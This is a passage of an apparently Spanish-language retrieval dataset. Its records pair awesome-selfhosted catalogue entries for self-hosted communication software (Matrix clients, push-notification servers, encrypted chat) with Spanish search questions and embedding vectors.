-0.01795, 0.0295, -0.01139, 0.00861, -0.06834, -0.002, 0.05746, 0.04995, 0.02642, 0.08066, -0.05533, 0.04204, 0.01559, -0.01173, 0.07029, -0.06722, 0.00436, -0.06997, -0.04248, -0.05615, 0.03435, 0.07426, 0.01522, 0.04858, -0.03883, -0.04941, -0.08238, 0.01905, 0.01047, -0.06966, -0.00479, 0.09163, 0.06158, -0.02576, 0.05363, -0.01025]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "cuales son las opciones para montar un sistema de comunicaciΓ³n privada entre dispositivos mΓ³viles y web", "v": [-0.01658, 0.09891, -0.07896, -0.232, -0.16055, -0.09103, -0.02774, 0.02689, -0.1347, -0.10626, -0.04138, -0.06546, 0.08401, -0.0284, 0.05787, -0.04922, 0.10052, -0.14249, 0.06564, -0.06316, -0.06597, -0.01382, -0.03001, -0.03495, -0.04171, 0.12517, 0.05959, -0.11067, -0.15168, 0.02041, 0.04922, 0.01173, 0.10218, 0.0598, -0.18218, 0.03446, 0.01756, 0.06079, 0.03848, -0.05207, -0.0684, -0.11522, -0.02936, 0.06764, 0.11947, -0.00775, -0.10958, -0.06798, 0.01354, -0.00417, -0.07597, 0.0546, -0.1005, 0.07123, -0.02817, -0.08908, 0.15565, -0.07514, 0.05227, -0.05718, -0.01662, 0.0177, -0.0342, 0.05101, 0.09376, 0.02274, -0.04306, 0.02606, -0.16169, -0.01151, 0.15297, -0.0656, 0.02645, 0.09413, 0.09401, 0.14225, -0.09711, 0.06391, 0.03229, 0.04581, 0.05488, -0.02505, -0.04293, 0.08239, -0.04984, 0.07446, -0.00165, 0.01659, -0.02876, 0.00839, 0.11499, 0.00185, -0.05049, 0.01827, -0.04143, -0.09392, -0.03352, 0.01164, -0.00633, -0.01566, 0.02924, 0.01451, -0.09302, 0.02424, -0.07026, -0.039, 0.08802, -0.04288, 0.06705, -0.11139, -0.03231, 0.01436, 0.02536, 0.00114, -0.06308, -0.06739, 0.02146, -0.02638, -0.04389, -0.00938, -0.07752, 0.01022, 0.04267, -0.06162, 0.09131, 0.04424, 0.00847, 0.03706, -0.00283, 0.07811, 0.10234, -0.11592, 0.02672, -0.04286, -0.0092, 0.00757, -0.01367, 0.03554, 0.03259, 0.0161, 0.0409, -0.03201, -0.10051, -0.07596, 0.10818, 0.05413, 0.02208, -0.03064, 0.00974, 0.04209, -0.06555, 0.07894, -0.08334, -0.0613, -0.09074, 0.03418, -0.05907, -0.07511, -0.00392, 0.10656, -0.06168, 0.00778, -0.04647, 0.03432, 0.00717, -0.02581, -0.08014, 0.02676, 0.09964, -0.01479, 0.00633, 0.04476, 0.06538, -0.04577, 0.00888, 0.04177, -0.02608, 0.0094, 0.01747, -0.07028, -0.02025, 0.05196, -0.0175, 0.00917, 0.02942, 0.00426, -0.03852, -0.01567, -0.04134, 0.0478, 0.01295, 0.06222, -0.01079, 0.09604, 0.09061, -0.06046, -0.09144, -0.0601, 0.03426, 0.06441, -0.06571, 0.01069, 0.04332, -0.00078, -0.00316, 0.03777, 0.01158, -0.02303, 0.03281, 0.05842, 0.05217, 0.00953, 0.04464, -0.04153, -0.04112, 0.04315, -0.00034, -0.01847, -0.02332, 0.0168, 0.04774, -0.00836, -0.02725, -0.01291, -0.01539, 0.06811, -0.04889, 0.01059, -0.04368, -0.08463, -0.02627, -0.03449, 0.01625, 0.02377, 0.0393, 0.00666, 0.05106, -0.01863, -0.02939, -0.02371, 0.02351, 0.0976, 0.0226, 0.03849, -0.05443, -0.07099, -0.06042, 0.02039, -0.02455, -0.10126, -0.00771, 0.02208, 0.00439, -0.01127, -0.00289, -0.01161]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "que programa hay para notificaciones push que se pueda auto-hospedar?", "v": [0.16593, 0.15226, -0.17076, -0.13311, 0.12302, -0.08802, 0.0564, -0.09904, -0.08041, -0.1496, -0.07095, -0.05931, 0.07249, 0.05262, -0.0558, 0.02799, 0.061, -0.01353, 0.03677, 0.17574, -0.00311, 0.09301, -0.01905, 0.0344, -0.05242, 0.03141, 0.02494, 0.07409, -0.1832, -0.05761, 0.10755, -0.04662, 0.0557, -0.04087, 0.04179, 0.0759, -0.00363, -0.00519, 0.02131, -0.09279, 0.06893, 0.01193, -0.04161, 0.01686, 0.01624, -0.1082, -0.04541, -0.03023, -0.02292, -0.07975, 0.03236, -0.01093, -0.0862, 0.0218, 0.09085, 0.07701, 0.11191, -0.05558, 0.00202, 0.01771, 0.07121, 0.02378, 0.02461, 0.06069, 0.00845, 0.01917, 0.10593, -0.00194, -0.08923, -0.04303, -0.04268, -0.05615, 0.13989, 0.02497, 0.01674, 0.07655, -0.07757, 0.05204, 0.05857, -0.06974, 0.01176, -0.01291, -0.01858, 0.0695, -0.06547, 0.01239, 0.04287, -0.04586, -0.02624, -0.00222, 0.00738, 0.03647, 0.03022, 0.16233, 0.01529, -0.0258, 0.16579, 0.03356, 0.04368, 0.04368, 0.00657, -0.07514, -0.02968, 0.0784, -0.02444, 0.03091, 0.08845, -0.1135, 0.08829, 0.00805, -0.01333, -0.06543, -0.07022, -0.10651, -0.00973, 0.03036, 0.02241, -0.08378, 0.12218, -0.06133, -0.07977, 0.03949, 0.01012, 0.02717, 0.02924, -0.00634, -0.10901, 0.10155, 0.0204, 0.08286, -0.00299, 0.03199, -0.01117, -0.00116, -0.00339, 0.09052, -0.03745, 0.01634, 0.04658, -0.06482, 0.05942, 0.139, 0.07717, -0.01351, 0.03932, 0.00915, -0.04745, -0.01915, -0.02562, 0.11594, 0.0109, 0.00095, 0.04626, -0.01531, -0.00922, 0.02251, 0.04042, -0.08427, 0.04232, 0.0999, -0.02007, -0.02292, -0.05825, 0.0057, 0.03309, -0.03992, -0.00331, -0.0008, 0.06754, 0.04638, -0.08441, 0.05393, 0.04069, -0.0475, -0.03719, -0.02001, -0.01242, -0.02479, -0.02477, -0.03953, -0.1091, 0.08283, -0.05148, -0.02783, -0.02674, 0.01346, -0.0613, 0.05231, 0.02223, -0.00017, -0.05968, 0.07692, -0.04173, 0.01343, -0.02271, -0.07357, -0.08999, -0.03205, 0.07608, -0.011, -0.06918, -0.0268, -0.07493, -0.00649, -0.01028, 0.01753, -0.00955, 0.05557, -0.02248, 0.10957, -0.00598, -0.02897, 0.06731, -0.01423, -0.06846, -0.01719, 0.01884, 0.01164, 0.04463, 0.04157, 0.01366, 0.04587, 0.05686, -0.00818, -0.02969, -0.03205, 0.06255, 0.04155, 0.07529, 0.06591, -0.07442, 0.01679, -4e-05, -0.02992, 0.06764, 0.06326, -0.04711, -0.09077, -0.06362, -0.05119, 0.06964, 0.0406, 0.02973, -0.05388, 0.01503, -0.04437, -0.0616, 0.04703, 0.06413, -0.06092, -0.04123, 0.07905, 0.05567, -0.06242, 0.10946, -0.02856]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Slack o Gitter que ponga la proteccion de datos primero?", "v": [0.00926, 0.00221, -0.08544, 0.05568, 0.14117, -0.13361, 0.11293, -0.14088, -0.19614, 0.04755, -0.00868, -0.05188, 0.00998, -0.02004, 0.01831, -0.02391, -0.01535, -0.13164, -0.02319, 0.01153, -0.08511, 0.02877, -0.00761, -0.23332, 0.02409, -0.1183, 0.1504, 0.01917, -0.07268, 0.1303, -0.00618, -0.0366, -0.07026, -0.02085, 0.0411, 0.06424, 0.10004, -0.01297, 0.1701, -0.02439, -0.00991, -0.18489, -0.01774, -0.04915, 0.00414, 0.01112, -0.04659, 0.10038, -0.0141, -0.01224, -0.05773, 0.03421, -0.03438, -0.06166, 0.00684, -0.07237, 0.0748, -0.04089, 0.01611, 0.0461, -0.0592, 0.14103, 0.11199, -0.00496, 0.07599, 0.0027, -0.01179, -0.03463, 0.00572, 0.09103, 0.06225, -0.01995, 0.02796, -0.10869, -0.06036, 0.00953, 0.05028, 0.04762, -0.01528, 0.04845, -0.06814, 0.03022, -0.02445, 0.09659, -0.04868, 0.01997, 0.04956, -0.08526, -0.03565, -0.06858, 0.03421, 0.06358, -0.0851, 0.13959, -0.01329, -0.01525, 0.00172, -0.00126, -0.02284, 0.02438, 0.08723, 0.01773, -0.15822, -0.00334, 0.10069, -0.02065, 0.0107, -0.04751, -0.04459, -0.05079, -0.00635, 0.02342, 0.00135, -0.02114, 0.03783, -0.04938, -0.03173, -0.03989, 0.0319, 0.00855, 0.05576, -0.06541, -0.04278, -0.04069, 0.07752, 0.05687, 0.035, 0.09637, -0.12862, 0.09142, -0.02226, -0.05433, -0.0229, -0.06045, -0.02709, 0.06011, -0.05331, -0.06702, 0.04412, -0.06842, 0.03792, 0.02303, -0.01176, 0.00436, 0.11731, 0.03505, 0.03559, 0.01246, -0.0632, 0.00978, -0.01256, 0.02705, 0.05104, 0.14285, 0.01028, 0.13403, -0.06385, -0.09273, 0.04523, 0.11584, 0.00554, -0.00372, 0.01521, 0.07009, 0.02609, -0.03277, 0.08605, -0.05878, 0.00296, 0.02113, -0.02033, 0.03547, 0.03438, -0.11572, 0.00467, -0.0807, -0.07082, -0.08968, 0.02491, -0.10666, 0.01892, 0.01749, -0.12515, -0.02334, -0.00266, -0.05902, -0.01033, -0.03638, 0.03796, 0.06633, 0.02916, 0.08997, -0.01024, -0.05714, -0.00062, -0.06281, -0.05888, -0.04913, 0.04408, -0.00987, -0.103, -0.01418, -0.07864, -0.00332, 0.0078, 0.03683, -0.07318, -0.02295, -0.01643, 0.03449, 0.02546, -0.02348, 0.04385, -0.02896, -0.02734, -0.05227, 0.01733, -0.039, 0.02092, -0.03555, 0.00088, 0.07167, 0.04145, 0.0242, -0.01689, -0.00571, 0.04164, 0.06732, -0.01857, 0.04995, -0.02511, 0.00108, 0.00265, 0.00616, 0.06846, 0.04423, -0.00438, -0.01349, -0.03806, -0.0202, 0.02119, 0.06408, -0.07858, -0.03245, -0.01387, -0.01422, -0.10652, 0.05846, -0.0034, -0.07773, 0.00919, 0.03456, 0.05928, -0.04425, 0.04002, -0.06965]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "como montaria un sistema de chat descentralizado y seguro sin necesidad de un servidor externo?", "v": [-0.05563, -0.06177, -0.16985, -0.05397, -0.11804, -0.15984, -0.06362, -0.11974, -0.00983, -0.05064, -0.14336, -0.03669, -0.00301, -0.03243, 0.06188, 0.02384, 0.0934, -0.05243, -0.00394, 0.00667, 0.00998, -0.10025, 0.14813, -0.06183, -0.09722, 0.10901, 0.01766, -0.07605, -0.09295, 0.09436, 0.04927, 0.0431, 0.11256, 0.00637, -0.00641, -0.12086, 0.05675, 0.02441, -0.04409, 0.04635, 0.01406, -0.03329, -0.03783, 0.02403, 0.05416, -0.02471, 0.08099, -0.10241, 0.05571, -0.07645, -0.12641, -0.09039, -0.14388, -0.07048, 0.03335, -0.06348, 0.0844, -0.07591, 0.10218, -0.12457, -0.14261, 0.1058, -0.00696, -0.03972, 0.03014, -0.03972, -0.12078, -0.03125, -0.07638, -0.03556, -0.05659, -0.05984, 0.07452, 0.005, -0.00484, 0.00208, -0.06628, 0.03077, 0.02601, 0.05422, 0.00582, 0.10241, -0.00545, 0.10894, -0.09184, -0.0683, 0.07105, 0.01234, 0.0694, 0.04637, 0.09609, 0.03557, -0.0467, 0.04256, 0.03032, -0.06957, 0.03305, 0.00067, -0.03397, 0.00698, 0.09037, -0.025, 0.00401, 0.07684, 0.02935, -0.05639, 0.17327, -0.10801, 0.06817, -0.09088, 0.01831, 0.03913, -0.01329, -0.04051, -0.05788, -0.07698, -0.00209, 0.08705, 0.02948, 0.03307, -0.03909, 0.03613, 0.01367, -0.0475, 0.02145, -0.07556, 0.03939, 0.0164, 0.06662, 0.05707, 0.01121, -0.04096, -0.10996, -0.05456, 0.01329, 0.02444, 0.00625, -0.02424, -0.01879, -0.01294, -0.04483, 0.05866, -0.04486, -0.08684, 0.11645, 0.0447, 0.06582, -0.10989, -0.06426, 0.03676, -0.04823, 0.06232, -0.04203, -0.0005, -0.07846, -0.01525, 0.02145, -0.12653, 0.03481, 0.09671, 0.02448, 0.0294, 0.06553, 0.07736, 0.02639, -0.00377, 0.00257, -0.01542, 0.06201, 0.02966, 0.00618, 0.04068, 0.02866, -0.05183, 0.03125, 0.00071, -0.0654, -0.09724, 0.03707, -0.01907, -0.08018, 0.0412, -0.03562, -0.00379, -0.04077, -0.03795, -0.03527, -0.00398, 0.03866, -0.00746, 0.06705, 0.01626, -0.08358, 0.07963, 0.01755, -0.08751, -0.05338, -0.05106, -0.00095, -0.03411, -0.06637, -0.02879, 0.02359, -0.08504, -0.02491, 0.04205, -0.03784, 0.08465, 0.00835, 0.09905, 0.0562, -0.00488, 0.129, 0.0037, -0.00556, -0.00371, 0.05616, 0.00694, -0.03042, -0.00949, 0.03374, -0.01115, 0.05699, 0.06472, -0.01223, -0.01459, 0.01126, 0.07329, 0.06079, -0.00618, -0.09839, -0.03617, -0.01011, 0.00251, 0.06401, 0.03118, 0.01977, -0.04766, -0.02717, -0.11841, 0.01086, 0.09929, -0.0497, -0.04542, -0.01406, -0.08827, -0.07297, 0.01855, -0.03162, -0.05872, -0.0203, -0.02378, 0.01329, -0.0434, 0.04155, -0.03401]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "quΓ© herramienta sirve para compartir pantalla de forma rΓ‘pida y simple por web?", "v": [-0.01551, 0.14185, -0.22148, -0.20476, -0.03299, -0.18185, -0.07555, -0.08893, 0.08606, -0.09038, -0.05024, -0.07027, 0.00291, -0.10446, 0.06054, 0.04736, 0.08161, -0.11807, 0.02754, -0.0448, -0.03364, 0.01919, -0.16321, -0.09157, -0.12547, -0.05524, 0.0579, 0.04195, -0.1998, 0.04422, 0.00841, 0.00326, 0.02405, -0.00394, -0.12823, -0.03811, 0.06345, 0.06739, -0.02525, 0.02449, -0.03678, 0.04937, -0.02918, 0.06686, 0.01258, 0.05259, -0.01074, -0.00105, 0.01848, 0.09089, -0.06778, -0.08134, -0.10389, 0.02394, -0.07089, -0.09155, 0.21259, -0.20095, 0.05697, -0.08762, -0.06816, -0.00517, -0.10211, -0.07876, -0.06481, -0.02957, -0.02564, 0.01904, -0.09825, 0.05547, -0.00553, -0.02073, 0.06849, -0.02195, 0.00959, 0.02067, -0.1069, 0.024, 0.06389, -0.01385, 0.10185, -0.02009, -0.07443, -0.05379, -0.04663, -0.05697, 0.03147, -0.03722, -0.03325, -0.07954, 0.01672, 0.08453, 0.01611, -0.023, -0.0124, -0.07016, 0.02265, 0.02755, 0.00074, -0.03583, 0.10591, -0.10173, -0.11243, 0.01196, -0.05195, 0.04592, -0.06352, -0.02113, -0.14233, -0.03573, 0.09862, 0.02572, -0.03186, 0.026, -0.02085, 0.04427, 0.0016, -0.01282, -0.07138, -0.03162, 0.02393, 0.02585, -0.05304, -0.0474, 0.01058, 0.03842, -0.00852, 0.08014, -0.06268, -0.03668, 0.01463, -0.11817, -0.07529, 0.01124, 0.01185, -0.05704, 0.03604, -0.06912, 0.02825, -0.12035, 0.05128, 0.00887, -0.07846, -0.13045, 0.0083, -0.03097, 0.103, -0.02156, -0.05911, 0.04876, -0.03804, -0.04389, -0.02721, -0.01797, -0.05605, -0.06252, -0.03431, 0.03256, -0.10319, 0.01335, -0.04832, -0.04952, 0.05858, 0.02572, 0.01108, -0.05936, -0.03835, 0.00726, 0.08769, 0.04998, 0.05265, 0.06352, 0.03241, -0.0832, -0.01922, -0.02385, -0.09384, 0.01022, -0.02751, -0.06656, -0.00583, 0.0033, -0.02453, 0.06078, -0.02063, -0.02873, 0.03328, -0.00074, -0.03305, 0.03035, 0.04611, 0.03702, -0.01973, -0.03573, 0.0363, 0.00723, -0.05991, -0.06215, 0.07255, -0.00549, -0.04619, -0.0913, 0.04233, -0.02036, -0.00974, 0.0494, -0.0191, 0.01015, 0.01559, 0.05335, 0.01004, 0.02631, 0.0483, -0.02053, 0.01413, -0.01452, 0.06114, 0.01546, -0.01534, 0.01178, 0.04921, -0.02134, -0.03844, -0.0082, 0.02683, 0.06083, 0.01635, 0.0192, -0.02864, -0.03932, 0.01982, -0.03213, 0.02996, -0.02304, 0.01561, -0.06329, -0.00449, -0.04227, -0.05901, 0.02136, -0.03462, 0.00075, 0.02464, 0.01452, -0.03547, -0.03641, -0.03389, -0.01621, -0.02997, -0.09879, -0.06999, -0.05054, 0.04164, 0.00308, -0.04313, 0.02551]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "con quΓ© puedo montar un chat privado con cifrado extremo a extremo?", "v": [-0.10406, 0.15149, -0.13823, 0.03575, -0.14453, -0.00013, -0.01677, 0.03228, -0.22277, -0.13957, 0.0563, -0.00883, -0.00886, -0.04388, 0.10225, -0.04893, 0.00905, -0.04824, 0.10629, -0.04453, 0.05823, -0.11298, 0.06176, -0.14624, -0.03537, -0.01666, -0.03568, 0.08941, -0.10137, 0.15452, 0.07318, 0.18134, 0.09406, 0.0364, 0.0417, -0.02628, 0.12446, -0.00059, -0.02327, 0.04795, 0.08401, -0.02604, 0.00469, -0.00228, 0.11912, -0.00926, -0.09379, 0.03489, 0.02968, 0.05252, 0.05144, -0.08674, -0.06247, -0.04139, -0.09288, 0.02722, 0.12975, 0.00066, 0.10782, -0.09961, 0.00259, 0.10231, 0.03804, 0.09989, 0.08752, -0.03228, -0.14557, 0.08731, -0.11036, -0.06852, -0.05642, -0.03491, -0.07096, 0.10086, 0.02153, -0.00883, -0.09953, 0.01848, -0.02633, 0.02254, -0.06722, -0.05974, -0.01877, 0.04557, -0.1052, -0.01269, 0.00393, 0.01136, 0.0789, 0.00264, 0.11835, 0.07551, -0.00328, -0.06556, -0.09668, -0.03105, 0.04082, 0.08673, -0.02702, 0.02014, 0.01429, 0.11892, -0.11584, 0.08641, 0.01668, 0.01223, -0.04949, -0.07425, 0.02418, 0.0381, 0.02171, 0.08426, -0.0042, -0.0128, -0.03094, -0.14033, -0.01295, 0.00445, 0.02385, -0.09411, -0.04879, 0.08668, 0.07319, -0.01413, -0.0401, -0.04576, -0.00747, 0.05566, 0.00903, 0.02483, -0.06228, -0.04077, 0.01439, -0.04026, -0.00313, 0.11483, -0.01939, 0.00832, 0.0159, 0.03064, 0.0116, 0.02553, -0.12535, -0.11378, 0.01624, -0.02371, -0.00137, -0.05702, -0.01253, 0.07155, 0.03774, 0.1284, 0.05211, 0.0851, -0.13807, 0.00139, 0.02423, -0.06922, 0.07454, 0.05937, 0.05611, -0.00849, -0.05884, -0.00576, -0.00124, 0.01932, -0.01463, -0.05339, 0.03317, -0.04544, -0.0986, -0.00529, 0.01669, -0.03794, 0.10785, 0.00033, -0.02413, -0.0503, -0.03534, -0.05115, 0.00186, -0.00358, -0.00558, -0.05792, 0.01759, 0.03252, 0.03112, 0.01392, -0.00047, 0.06646, -0.04521, 0.06567, -0.00759, 0.00896, 0.03159, -0.02485, -0.00288, 0.04477, 0.0179, -0.02256, 0.01496, 0.01004, -0.01135, 0.01893, 0.0039, -0.03932, -0.13946, 0.04235, 0.02364, 0.06494, 0.07497, -0.0096, -0.00807, -0.01755, -0.00192, 0.08268, -0.0024, -0.01302, -0.03223, 0.04009, 0.02673, 0.03402, 0.02448, -0.03038, 0.06732, 0.06962, 0.01278, 0.02907, 0.02515, 0.07385, -0.05508, -0.01383, 0.0008, -0.00814, 0.04825, 0.01317, 0.0101, 0.00254, -0.04274, -0.00838, -0.00098, 0.06365, 0.00793, -0.01628, -0.003, 0.00667, -0.07565, 0.04423, 0.00942, -0.01431, -0.00366, 0.04923, -0.02106, -0.05731, 0.02398, -0.02537]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "cual es una alternativa libre para crear redes de mensajerΓ­a descentralizadas?", "v": [-0.06737, 0.02, -0.0675, -0.05509, -0.06331, -0.05647, -0.10929, -0.00913, -0.09665, -0.14091, -0.04362, -0.20039, -0.03175, -0.05346, 0.09799, 0.03427, 0.04113, 0.08988, 0.20844, -0.09281, 0.01349, -0.03707, -0.09446, -0.09978, -0.07185, -0.07489, 0.01696, -0.06612, -0.09584, 0.07048, 0.03878, -0.07226, 0.08981, 0.03949, 0.01608, 0.03963, 0.13242, 0.11077, -0.04414, -0.00092, 0.07108, 0.03618, -0.13613, 0.07125, 0.01629, -0.00873, -0.02415, -0.04455, -0.01757, 0.03935, -0.08233, -0.03212, -0.20036, 0.00266, 0.02303, -0.02094, 0.16186, -0.10372, -0.04329, -0.0601, -0.01318, 0.05747, 0.01323, -0.03691, -0.00543, -0.04907, -0.04768, -0.02098, -0.1364, 0.11402, 0.15407, -0.00634, 0.03294, -0.01723, 0.01027, 0.1339, -0.16607, 0.04931, -0.0545, 0.0928, 0.06447, -0.06257, 0.03344, -0.01149, -0.01835, -0.06287, 0.04267, -0.07877, -0.02673, -0.01308, 0.04611, 0.01457, -0.08021, 0.07937, 0.03055, -0.07089, -0.06202, -0.11449, -0.01058, 0.10081, 0.01281, -0.03942, -0.05225, 0.05712, 0.01285, -0.07862, 0.01552, -0.03739, 0.0506, -0.02325, 0.01244, 0.02938, 0.10109, 0.00338, -0.01121, -0.0443, -0.0268, 0.06348, 0.06883, -0.00617, -0.05274, 0.01963, -0.00226, -0.06156, 0.04003, 0.10765, 0.01035, 0.05016, 0.03056, 0.08842, 0.01819, -0.04898, -0.07651, -0.13824, -0.07875, -0.03291, -0.00253, -0.04382, 0.01205, 0.0184, -0.04279, 0.01383, -0.05919, -0.08155, 0.05234, 0.07836, 0.0274, -0.15693, -0.0614, 0.06581, 0.00502, 0.02738, -0.05574, 0.01895, -0.04235, 0.06687, -0.08725, -0.07708, -0.04928, 0.12435, 0.01631, 0.00672, -0.03913, 0.01833, -0.01167, -0.05637, -0.04124, 0.05199, -0.00457, 0.02921, -0.06752, 0.05514, 0.061, -0.06009, 0.05377, -0.02371, -0.01649, -0.0425, -0.02015, -0.06877, -0.00153, 0.02582, -0.04115, -0.00778, 0.05656, -0.01313, -0.02166, 0.02151, 0.04155, 0.06651, -0.06901, 0.00556, -0.09926, 0.0214, 0.03035, -0.04742, -0.00712, -0.0762, 0.00326, 0.00199, -0.05718, -0.05555, -0.00777, -0.01985, -0.12746, 0.0055, -0.08885, 0.00346, -0.0147, 0.07451, 0.05315, -0.03814, 0.07497, -0.05039, -0.02109, 0.00511, 0.0754, -0.06466, 0.01127, 0.00945, 0.01809, 0.01804, 0.00291, -0.00203, -0.04917, 0.07076, -0.01296, 0.04778, 0.01747, 0.0052, 0.00311, 0.00043, -0.00926, 0.02045, 0.04209, -0.01661, 